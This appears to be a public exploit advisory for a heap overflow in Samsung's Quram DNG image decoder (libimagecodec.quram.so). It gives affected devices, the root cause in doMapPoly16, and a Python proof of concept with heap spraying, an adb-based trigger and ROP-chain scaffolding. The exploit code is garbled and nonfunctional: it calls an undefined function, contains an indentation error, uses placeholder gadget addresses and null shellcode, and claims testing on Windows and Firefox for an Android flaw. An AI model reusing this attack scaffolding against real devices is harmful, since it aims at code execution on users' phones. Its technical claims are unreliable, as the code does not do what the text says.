=============================================================================================================================================
| # Title     : Samsung QuramDNG Heap Exploitation via Malformed (libimagecodec.quram.so)                                                   |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
| # Vendor    : System built‑in component. No standalone download available.                                                                |
=============================================================================================================================================

[+] Summary : A vulnerability exists in Samsung’s image decoding library (libimagecodec.quram.so) responsible for parsing Digital Negatives (DNG).
              A malformed DNG containing oversized IFD entries can cause heap corruption.
              With precise heap grooming, this condition may lead to remote code execution when the malicious DNG is decoded.

[+] Affected Platforms (Likely Impact)

Devices using Quram Codec and containing vulnerable libimagecodec.quram.so, typically:

Galaxy S22 / S23 / S24 series

Galaxy Z Fold / Z Flip

Galaxy A and Tab series

Any Samsung model using Quram decoder before SMR‑SEP‑2025

[+] OS Builds Affected:

Android builds where the Quram codec is present and security patch level < September 2025

[+] Technical Description (Root Cause)

libimagecodec.quram.so fails to sanitize the size of metadata entries when parsing a DNG file:

The IFD entry count is taken from the attacker-controlled file.

Size validation is missing.

Heap allocator metadata and adjacent buffers may be overwritten.

Controlled overwrite can result in hijacked code execution.

Critical vulnerable function:

doMapPoly16()

located inside Quram image parsing logic.

Instructions For Saving:
------------------------
1) Save file as:
   poc.py

Instructions For Running:
-------------------------
python3 poc.py
		  

[+]  POC : 

import os
import subprocess
import time

class QuramDngExploit:
    def __init__(self):
        self.malicious_dng = None
        
    def craft_exploit(self):
        """Create DNG with controlled heap layout"""
        print("[*] Crafting malicious DNG file...")

        dng_data = create_malicious_dng()
        
        return dng_data
    
    def spray_heap(self):
        """Spray heap with controlled objects"""
       
        spray_code = """
        import java.util.ArrayList;
        
        public class HeapSpray {
            private static ArrayList<byte[]> sprayList = new ArrayList<>();
            
            public static void spray(int count, int size) {
                for (int i = 0; i < count; i++) {
                    byte[] buffer = new byte[size];

                    for (int j = 0; j < size; j += 8) {

                        buffer[j] = (byte)0x41;
                    }
                    sprayList.add(buffer);
                }
            }
        }
        """
        
    def trigger(self):
        """Trigger the vulnerability"""
        print("[*] Triggering vulnerability...")

        temp_file = "/data/local/tmp/exploit.dng"
        with open(temp_file, 'wb') as f:
            f.write(self.craft_exploit())

        cmd = [
            'adb', 'shell',
            'am', 'broadcast',
            '-a', 'android.intent.action.MEDIA_SCANNER_SCAN_FILE',
            '-d', f'file://{temp_file}'
        ]
        
        subprocess.run(cmd)

        print("[*] Waiting for com.samsung.ipservice to process file...")
        time.sleep(10)

        self.monitor_logcat()
    
    def monitor_logcat(self):
        """Monitor for crash logs"""
        print("[*] Monitoring logcat for crashes...")
        logcat = subprocess.Popen(
            ['adb', 'logcat', '-s', 'DEBUG'],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE
        )
        
        for line in logcat.stdout:
            line = line.decode('utf-8', errors='ignore')
            if 'SIGSEGV' in line or 'libimagecodec.quram' in line:
                print("[+] Crash detected!")
                print(line)
                break
    
    def build_rop_chain(self):
        """Build ROP chain for ARM64"""
        rop_chain = []
                gadgets = {
            'pop_x0': 0x123456,  # placeholder
            'pop_x1': 0x123457,
            'system': 0x123458,
            'blr_x19': 0x123459,
        }
        
        return rop_chain
    
    def achieve_rce(self):
        """Attempt to achieve Remote Code Execution"""
        print("[*] Attempting to achieve RCE...")

        
        shellcode = (

            b"\x00\x00\x00\x00"  
        )
        
        return False

if __name__ == "__main__":
    exploit = QuramDngExploit()
    
    print("[*] Starting QuramDng exploit (CVE-2025-21043)")
    print("[*] Target: libimagecodec.quram.so")
    print("[*] Vulnerability: OOB Write in doMapPoly16")

    exploit.craft_exploit()

    exploit.trigger()
    
    print("[*] Exploit completed")



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================